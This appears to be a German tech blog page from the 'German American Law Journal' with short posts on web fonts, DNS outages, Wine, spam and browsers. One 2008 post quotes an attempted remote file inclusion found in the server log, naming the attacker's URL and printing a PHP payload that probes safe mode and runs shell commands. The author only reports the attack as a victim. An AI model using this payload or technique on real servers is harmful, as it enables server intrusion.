Welcome to Washington

Mitwirkende









© 2004-9
Link
RSS
gBlawgs OPML

Archiv 2008
Archiv 2007
Archiv 2006
Archiv 2005
Archiv 2004



Weblog Commenting by HaloScan.com



Interference

Any illegal interference with the operation of this server will be referred to the appropriate investigative and prosecutorial authorities. This has happened, and the server administration is tired of illegal interference, in particular by referrer spammers and phishers who try to break into servers and to make innocent visitors divulge financial and personal data.





 23 Jun 2010    Google Web Fonts im Einsatz
Jetzt sind in German American Law Journal Google Web Fonts im Einsatz. Die Experten versehen sie mit Kritik, doch bieten die Fonts die Hoffnung, dass die Schrifttypen auf allen Geräten einigermaßen gleich aussehen.

Der Font am Eingang heißt Yiggivoo und ist verzerrt. Unverzerrt ist er bemerkenswert sauber und gestylt. Peter Wiegel, der Künstler, gestattete mir die Verwendung und Verzerrung, doch ist das komprimierte Bild misslungen. Ich hoffe, es bald zu ersetzen. Der Font wäre auch eine empfehlenswerte Ergäzung der Google Web Fonts.

     URL    

 10 Jun 2009    GALJ auf iPhone: 4fon.com
Auf dem iPhone-Rechner ist die Smartphone-Fassung des German American Law Journal am praktischsten: http://4fon.com.

Für die Verwaltung des GALJ-Servers eignet sich das iPhone nicht so sehr wie das Nokia N770. Mit der Aktivierung der PC-Fähigkeiten des iPhone-Gerätes und der Nutzung des mit dem AppStore von Apple konkurrierenden Cydia-Angebotes kann man nützliche Programme installieren, die das Telefon auch für Remote Server Admin-Aufgaben erträglich machen.

Allerdings muss der Kunde die Sabotage von Apple fürchten, mit der der Konzern - wohl rechtswidrig - die Konkurrenz vom Gerät schubsen will. Mit den Nokia-Geräten ist man als Admin daher besser bedient.

     URL    

 12 Mar 2009    Cookies in Windows 7
Was man als Linux- und Unixbenutzer in Firefox nicht sieht, fällt mit Firefox under Windows auf: Auch die German American Law Journal-Seiten setzen Cookies, sagt Firefox. Die Inhalt der Cookies verweist nicht auf das GALJ. Vermutlich stammen sie von verwandten Skripten und Hilfesmodulen. Das ist ärgerlich, wenn man Wert darauf legt, Besucher nicht mit Cookies zu belästigen.

     URL    

 31 Jan 2009    ENom DNS Down?
Da glaubt man, alle technischen Probleme der elektronischen Welt seien gelöst, und als nächstes könnte man sich der biochemischen Computerrechtswelt zuwenden, fällt das DNS-System bei ENom aus. So sieht es jedenfalls nach ersten Prüfungen (Server an, nix traceroute, über IP erreichbar, auch ENom unerreichbar) und frischen Kommentaren im Internet aus. Das ist nicht das erste Mal. ENom ist gut, was den Service für Domaininhaber angeht. Sinnvolles Managementsystem und nicht soviel Reklame und Umständlichkeiten wie Godaddy. Aber 2005, 2007, 2009 DNS-Ausfälle - es wird höchste Zeit, das ENom das in den Griff bekommt. Anwalt.us, GALJ.info, Recht.us gehen nicht; EmbassyLaw.com und 4fon.com mit der Smartphoneversion von US-Recht auf Deutsch zum Glück doch - über einen anderen Domainprovider. -- Nach nicht mehr als zwei Stunden ist das Problem behoben. Der DNS-Dienst geht wieder, zumindest teilweise.

     URL    

 25 May 2008    Wie habe ich denn das verdient?

Azaharbebe1969 schreibt mir:
Thanks for publishing this great photo you qualified for a SPECIAL gift. CLICK HERE to claim your gift. Klicken soll ich auf http://snipurl.com/2aj..., um mein Geschenk zu erhalten. Ein Geschenk der Danaer vielleicht? So neugierig bin ich nicht, und für Geschenke gibt es keinen Anlass.

Verfasser: German American Law Journal

     URL    

 06 May 2008    Da weiß man, was man hat

Wer traut schon Software ohne Quellkode? Jedenfalls für die Kanzlei, wenn man die Programmierer oder Eigentümer der Schmiede nicht kennt oder von ihrer Zuverlässigkeit überzeugt ist? Viele IT-Mandanten bauen zu Recht auf den Kontakt mit den Kunden und schaffen sich Vertrauen, das Kunden dann auch ihrer Software entgegenbringen.

Die Lücken im akzeptablen Angebot füllt der Verfasser seit Jahren mit eigenen Werken. Schwachstellen kann er sich selbst zuschreiben oder ausmerzen; Trojaner gibt es nicht. Doch sein Lieblings-OS ist tot, und seine Windows-Anwendungen lagen brach, weil er diesem OS noch weniger denn je traut und es beruflich nicht mehr anrührt.

Da freut es, dass das mit Google Picasa installierte Wine echt gut geworden ist. Aus Neugier, Jux und Dollerei und mit VirtualBox im Hinterkopf auf eine alte .exe geklickt, und - oh Wunder - hervor kommt ein altes Verschlüsselungsprogramm. Ob Twofish, Rijndael oder Blowfish, alles klappt auch im *n*x-System.

Der interne Aufruf anderer Programme zaubert die OS-eigenen Werke herbei - wie unter Windows, nur eben kein Windows. Klasse. Zahlreiche Eigenwerke laufen ebenso problemlos. Das langignorierte Wine ist besser als erwartet geworden. Auch das LAWgistic-Kanzleisystem läuft mit Wine und OpenOffice. Gute Gründe, die Kollegen wieder einmal zu animieren, ein sichereres Betriebssystem in der Kanzlei zu versuchen.

Verfasser: German American Law Journal

     URL    

 04 Apr 2008    Sie möchten den Text?

Wer den Text des German American Law Journal auf die Kanzleiwebseite oder eine sonstige Webseite aufnehmen möchte, muss nachfragen. Klauen geht nicht.

Verfasser: German American Law Journal

     URL    

 15 Mar 2008    Trackbacks

Trackbacks sind eine feine Sache, aber wie sie funktionieren, habe ich immer noch nicht begriffen. Schon als ich vor 5 Jahren die ersten Trackbacks sah und die Diskussion von Blosxom-Plugin-Schreibern verfolgte, war mir nicht klar, wer wem wie das URL versetzen soll. Daran hat sich bis heute nichts geändert.

Warum schnappt sich nicht jedes Blog einfach die ankommenden Verknüpfungen? Das ging doch schließlich ganz gut mit den Referrern. Die waren auch mal eine gute Sache bis die Spammer kamen und Referrerlisten den Garaus machten.

Verfasser: German American Law Journal

     URL    

 02 Mar 2008    Warum ich PHP nicht mag

Im error.log findet sich Komisches. Ein URL soll hiermit ersetzt werden: http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt.

wget holt damit dies:
/\/\/\ Response CMD /\/\/\

Owned by #Romania!

****HIER STEHT WAS VON PHP********** if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } exit;
Kommt mir nicht sauber vor. Als ob der Kalendar missbraucht würde.

Verfasser: German American Law Journal

     URL    

   Schlecht mit IE

Oh, sehen die Blogs schlecht im Internet Explorer aus. Da sieht man, wie lange ich schon nicht mehr an IE-Nutzer oder Windows gedacht habe. Benutzt noch jemand IE? Oder Mosaic? Oder Netscape?

Ich kann mir kaum vorstellen, für diese Browser die Blogs zu umzugestalten. Wer nicht Firefox oder Opera oder Elinks benutzt, sollte am besten das German American Law Journal in der für PDAs und Telefongeräte gestalteten Fassung besuchen - dem Stil des Journals von 1993.

Und Windows? Im Alltag ist Windows das, was nicht funktioniert und verzweifelte Kollegen zum Meckern und Fragen nach Lösungen bringt. Anscheinend sind die Blogs jedoch im Großen und Ganzen auch in Windows lesbar.

Verfasser: German American Law Journal

     URL    

-=- Aktuelles -=-






Wetter


Rotierende Feeds

Im German American Law Journal

US-Recht auf Deutsch:
American Edition:

Mission Blogumfeld:
Hilfe
Ideen
Technisches